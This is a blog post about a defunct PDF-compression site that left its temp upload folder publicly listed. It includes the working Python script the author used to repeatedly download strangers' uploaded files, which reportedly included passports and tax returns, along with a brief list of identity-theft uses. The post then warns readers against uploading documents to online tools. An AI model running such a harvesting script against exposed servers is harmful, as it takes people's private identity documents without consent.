This post was originally written in March 2014 but never published. It has been lightly edited for clarity, but the content, tone and code are preserved as they were. The site in question — compress-pdf.co.uk — no longer exists.
Disclaimer
The PDFs I collected were later deleted. They were not abused in any way.
This post is for educational purposes only. Any illegal acts you partake in are your own responsibility; I will not be held liable for any trouble you may (will) get into. And frankly, I think you are stupid if you try.
Introduction
This past week I have been messing with a bit of Python and web scraping, and I accidentally stole a few passports in the process... Oops.
There was a website called compress-pdf.co.uk — a free online tool that let you upload a PDF and get a smaller, compressed version back. Simple enough. Millions of these sites exist.
The problem? Their /temp_dl/ directory had directory listing enabled. That means anyone could just navigate to compress-pdf.co.uk/temp_dl/ and see every single file that users had uploaded for compression. No authentication, no access control, just an open Apache directory index.
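Spotting this class of misconfiguration is trivial: Apache's auto-generated index pages have a telltale "Index of /" title and a "Parent Directory" link. A minimal sketch of such a check (the helper name and sample HTML below are mine, not from the original post):

```python
def looks_like_directory_index(html):
    """Heuristic check for an Apache-style auto-generated directory listing."""
    markers = ("<title>Index of /", "Parent Directory")
    return any(marker in html for marker in markers)

# Canned example of an Apache index page (no network needed):
sample = """<html><head><title>Index of /temp_dl</title></head>
<body><h1>Index of /temp_dl</h1>
<a href="../">Parent Directory</a>
<a href="small_report.pdf">small_report.pdf</a>
</body></html>"""

print(looks_like_directory_index(sample))  # True
```

It's only a heuristic — a custom 200 page or a non-Apache server would need different markers — but it was more than enough here.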
People were uploading all kinds of things: scanned passports, internal company documents, tax forms, contracts, bank statements — all sitting in a publicly browsable folder.
The Script
I wrote a quick Python script that would periodically scrape the directory listing and download any new files:
```python
import requests
import time
import os.path
import urllib
from bs4 import BeautifulSoup

url = "http://www.compress-pdf.co.uk/temp_dl/"
output_path = "pdf/"  # Save PDFs to this folder
sleeptime = 600

while True:
    # Cleans up the cache.
    urllib.urlcleanup()
    html = requests.get(url)
    soup = BeautifulSoup(html.text)
    for link in soup.find_all("a"):
        log_file = open("pdf.log", "a")
        if link.get("href").startswith("small_"):
            filename = link.get("href")
            if len(link.get("href")) > 254:
                filename = link.get("href")[:50] + ".pdf"
            if os.path.isfile(output_path + filename.replace("small_", "")) == False:
                urllib.urlretrieve(
                    url + link.get("href"),
                    output_path + filename.replace("small_", ""),
                )
                print "Downloaded: " + filename.replace("small_", "")
                log_file.write(
                    time.strftime("%c")
                    + " Downloaded: "
                    + filename.replace("small_", "")
                    + "\n"
                )
            if os.path.isfile(output_path + filename.replace("small_", "")) == True:
                print "Skipped: " + filename.replace("small_", "")
                log_file.write(
                    time.strftime("%c")
                    + " Skipped: "
                    + filename.replace("small_", "")
                    + "\n"
                )
        log_file.close()
    print "Waiting: " + str((sleeptime / 60)) + " minutes til next sweep"
    time.sleep(sleeptime)
```
Requirements: Requests, BeautifulSoup4
The script ran every 10 minutes, checked the directory listing for new files prefixed with small_ (the compressed output), and downloaded anything it hadn't already grabbed. Simple, dumb, effective.
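The script above is Python 2, preserved as it was written. For reference, the core of the sweep — pulling the small_-prefixed links out of the directory index — could be sketched in modern Python 3 using only the standard library (the sample HTML is made up for illustration):

```python
from html.parser import HTMLParser

class IndexLinkParser(HTMLParser):
    """Collect href values from <a> tags in a directory listing page."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)

def compressed_files(index_html):
    """Return hrefs that look like the site's compressed output files."""
    parser = IndexLinkParser()
    parser.feed(index_html)
    return [href for href in parser.links if href.startswith("small_")]

sample = '<a href="../">Parent Directory</a><a href="small_doc.pdf">small_doc.pdf</a>'
print(compressed_files(sample))  # ['small_doc.pdf']
```

From there it's the same loop: compare each name against the files already on disk and fetch whatever is new.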
What I Found
Over the course of a few days, the script collected hundreds of PDFs. Most were boring — school assignments, random documents, marketing brochures. But mixed in with the mundane stuff were:
- Scanned passports — full color, high resolution, from multiple countries
- National ID cards
- Tax returns with full names, addresses, and social security numbers
- Internal corporate documents — contracts, employee records, financial reports
- Bank statements
People were compressing these sensitive documents without a second thought, trusting that the site would handle them responsibly. The site didn't even bother to clean up the temp directory.
What I Could Have Done With This
With a collection of scanned passports and identity documents, a malicious actor could:
- Identity theft — open bank accounts, apply for credit cards, take out loans
- Forge documents — create convincing fake IDs using real templates and data
- Social engineering — use the personal details to impersonate someone convincingly
- Sell the data — identity documents fetch good prices on dark web marketplaces
I did none of these things. I deleted everything after confirming the scope of the problem.
The Lesson
Never upload sensitive documents to random websites. This applies to:
- PDF compressors
- File converters (Word to PDF, image resizers, etc.)
- "Free" online tools of any kind
You have no idea how these sites handle your files. They might store them indefinitely. They might have directory listing enabled. They might be logging everything. They might be the ones harvesting the data intentionally.
If you need to compress a PDF, do it locally. There are plenty of free tools that run on your own machine:
- Preview on macOS (Export as PDF with Quartz filter)
- Ghostscript on any platform
- qpdf — a command-line PDF toolkit
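For the Ghostscript route, the standard recipe is the pdfwrite device with one of the -dPDFSETTINGS presets (/screen is smallest, /ebook a reasonable middle ground, /prepress highest quality). A hedged sketch of driving it from Python — the file names are placeholders, and the command only runs if gs is actually installed:

```python
import os
import shutil
import subprocess

def gs_compress_command(src, dst, quality="ebook"):
    # Standard Ghostscript flags for shrinking a PDF.
    # quality is one of: screen, ebook, printer, prepress.
    return [
        "gs",
        "-sDEVICE=pdfwrite",
        "-dCompatibilityLevel=1.4",
        "-dPDFSETTINGS=/" + quality,
        "-dNOPAUSE",
        "-dBATCH",
        "-dQUIET",
        "-sOutputFile=" + dst,
        src,
    ]

cmd = gs_compress_command("passport-scan.pdf", "passport-scan-small.pdf")
# Only invoke Ghostscript if it is installed and the input exists:
if shutil.which("gs") and os.path.exists("passport-scan.pdf"):
    subprocess.run(cmd, check=True)
```

Your documents never leave your machine, which is the entire point.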
Your passport deserves better than a sketchy .co.uk website's temp folder.
